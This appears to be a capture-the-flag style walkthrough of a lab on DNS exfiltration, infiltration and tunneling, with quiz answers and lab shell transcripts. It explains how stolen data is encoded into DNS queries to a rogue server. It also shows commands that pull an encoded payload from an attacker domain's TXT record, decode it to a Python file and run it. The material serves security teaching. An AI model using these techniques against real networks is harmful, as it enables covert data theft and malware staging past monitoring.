Techniques used to exfiltrate and infiltrate data.
Client machine reaches out to a DNS server to resolve a Fully Qualified Domain Name (FQDN) to an IP address.
DNS is being used as a Data Exfiltration and Data Infiltration tool via DNS queries.
DNS Tunneling and how it is used to tunnel different protocols like (HTTP) through DNS.
What is DNS?
Domain Name System refers to a naming system that resolves domain names with IP addresses.
If you were on Windows, what command could you use to query a txt record for 'youtube.com'?
Answer: nslookup -type=txt youtube.com
If you were on Linux, what command could you use to query a txt record for 'facebook.com'?
Answer: dig facebook.com TXT
AAAA stores what type of IP Address along with the hostname?
Answer: IPv6
Maximum characters for a DNS TXT Record is 256. (Yay/Nay)
Answer: Nay (It is 255 characters)
What DNS Record provides a domain name in reverse-lookup?
Answer: PTR
What would the reverse-lookup be for the following IPv4 Address? (192.168.203.2)
Answer: 2.203.168.192.in-addr.arpa
Steps to Reproduce:
$nslookup-type=PTR192.168.203.2Server:106.51.113.29Address:106.51.113.29#53** server cant find 2.203.168.192.in-addr.arpa: NXDOMAIN
DNS Exfiltration
DNS Exfiltration is a cyberattack on servers via the DNS, which can be performed manually or automatically.
In a manual scenario, attackers often gain unauthorized physical access to the targeted device to extract data from the environment.
In automated DNS exfiltration, attackers use malware to conduct the data exfiltration while inside the compromised network.
DNS is a service that will usually be available on a target machine and allowing outbound traffic typically over TCP or UDP port 53. This makes DNS a prime candidate for hackers to use for exfiltrating data.
Data Exfiltration
Data exfiltration through DNS could allow an attacker to transfer a large volume of data from the target environment.
Moreover, DNS exfiltration is mostly used as a pathway to gather personal information such as social security numbers, intellectual property, or other personally identifiable information.
How it's done?
DNS exfiltration is mostly used by adding strings containing the desired 'loot' to DNS UDP requests.
The string containing the loot would then be sent to a rogue DNS server that is logging these requests.
To the untrained eye this could look like normal DNS traffic or these requests could be lost in the shuffle of many legit DNS requests.
What is the maximum length of a DNS name?
Answer: 253 (Length includes dots)
This limits how much data we can exfiltrate in a single request!
DNS Exfiltration Practice - Orderlist
Login into the machine and check the task file in order folder:
$sshuser@10.10.47.165Theauthenticityofhost'10.10.47.165 (10.10.47.165)'can't be established.ECDSA key fingerprint is SHA256:t/AngHz/N9sXqytgBiSq5vkmKrJaxoXgHyGRx1CdQjI.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.47.165' (ECDSA) to the list of known hosts.user@10.10.47.165'spassword:WelcometoUbuntu16.04.7LTS (GNU/Linux 4.4.0-186-genericx86_64)*Documentation:https://help.ubuntu.com*Management:https://landscape.canonical.com*Support:https://ubuntu.com/advantage86packagescanbeupdated.63updatesaresecurityupdates.Lastlogin:FriFeb2610:47:052021user@user1:~$lschallengesdns-exfil-infiltshark-capture.instructionsuser@user1:~$cdchallenges/user@user1:~/challenges$lsexfiltrationinfiltrationuser@user1:~/challenges$cdexfiltration/user@user1:~/challenges/exfiltration$lsidentifyorderlistuser@user1:~/challenges/exfiltration$cdorderlist/user@user1:~/challenges/exfiltration/orderlist$lsorder.pcapTASKuser@user1:~/challenges/exfiltration/orderlist$catTASKTheorder.pcapfilehassuspeciousqueries.Usethe~/dns-exfil-infil/packetyGrabber.pytodecodethedataandanswerthequestionsaccrodingly.IDENTIFYTHEDOMAINNAMEUSEDTOEXFILTRATEDATAusethefollowingcommandtoseeallDNSQueriestshark-rorder.pcap-Tfields-edns.qry.name(ignorethe.localdomainpart)UsethepacketyGrabber.pylocatedin~/dns-exfil-infil/foldertodecodetheDNSqueriestoaplain-textfile.python3~/dns-exfil-infil/packetyGrabber.pyIGNORETHEEXCEPTIONTHROWNATTHEENDOFSCRIPT
Enter the plain-text after you have decoded the data using packetyGrabber.py found in ~/dns-exfil-infil/ folder.
Answer: administrator:s3cre7P@ssword
Steps to Reproduce:
The domain name used to EXFILTRATE data: badbaddoma.in
Run packetyGrabber.py to decode the data in cap3.pcap file:
user@user1:~/challenges/exfiltration/identify$python3~/dns-exfil-infil/packetyGrabber.pyFilecaptured:cap3.pcapFilenameoutput:identity.txtDomainName (Example: badbaddoma.in): badbaddoma.in[+] Domain Name set to badbaddoma.in[+] Filtering for your domain name.[+] Base58 decoded.[+] Base64 decoded.[+] Output to identity.txtException ignored in: <bound method BaseEventLoop.__del__ of <_UnixSelectorEventLoop running=False closed=True debug=False>>
Traceback (most recentcalllast):File"/usr/lib/python3.5/asyncio/base_events.py",line431,in__del__File"/usr/lib/python3.5/asyncio/unix_events.py",line58,incloseFile"/usr/lib/python3.5/asyncio/unix_events.py",line139,inremove_signal_handlerFile"/usr/lib/python3.5/signal.py",line47,insignalTypeError:signalhandlermustbesignal.SIG_IGN,signal.SIG_DFL,oracallableobjectuser@user1:~/challenges/exfiltration/identify$lscap1.pcapcap2.pcapcap3.pcapidentity.txtTASKTASK1.saveuser@user1:~/challenges/exfiltration/identify$catidentity.txtadministrator:s3cre7P@ssword
DNS Infiltration
DNS infiltration defines the process where malicious code is ran to manipulate DNS servers either using automated systems where attackers connect remotely to the network infrastructure or manually.
Use case
DNS infiltration is primarily used for file dropping or malware staging efforts. With behavioral, signature based, or reputation based threat detection systems it's possible this attack method could be caught.
However, if this method of transporting data goes unnoticed it could lead to malicious activity such as code execution in organization's environment. Historically, this has cased havoc and disruption for various well known companies.
DNS protocol could be used as a covert protocol that could aid in malware staging and execution efforts to communicate back to an attacker's C2 (Command and Control) server/s.
Demo
$nslookup-type=txtrt1.badbaddoma.in|grepZa|cut-d \" -f2>mal.py$python3~/dns-exfil-infil/packetySimple.pyFilename:mal.py[+] Reading from file...[+] Base58 decoded.[+] Base64 decoded.[+] Done, mal.py is decoded.$lsmal.py$catmal.pywhileTrue:print("maLwAre CoDe")
Store the required data in the file using grep and cut.
user@user1:~/challenges/infiltration$nslookup-type=TXTcode.badbaddoma.inServer:10.0.0.2Address:10.0.0.2#53Non-authoritativeanswer:code.badbaddoma.intext="YeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44"Authoritativeanswerscanbefoundfrom:user@user1:~/challenges/infiltration$nslookup-type=TXTcode.badbaddoma.in|grepYee|cut-d \" -f2>bad.pyuser@user1:~/challenges/infiltration$catbad.pyYeeTbunLbACdXq193g6VHXRuDQ9Y1upaAzA3UkpCr8yBBE68JEXU32wxNE44user@user1:~/challenges/infiltration$python3~/dns-exfil-infil/packetySimple.pyFilename:bad.py[+] Reading from file...[+] Base58 decoded.[+] Base64 decoded.[+] Done, bad.py is decoded.user@user1:~/challenges/infiltration$catbad.pyimportos; print(os.uname()[2])user@user1:~/challenges/infiltration$python3bad.py4.4.0-186-generic
DNS Tunneling
Companies will typically have Firewalls, an IDSs (Intrusion Detection Systems) and/or and IPSs (Intrusion Protection Systems) in place in order prevent/alert when unwanted inbound and outbound protocols pass through their network.
The one protocol that is rarely monitored by companies is DNS. Because of this, hackers are able to bypass a lot of the unwanted protocols by using DNS tunneling.
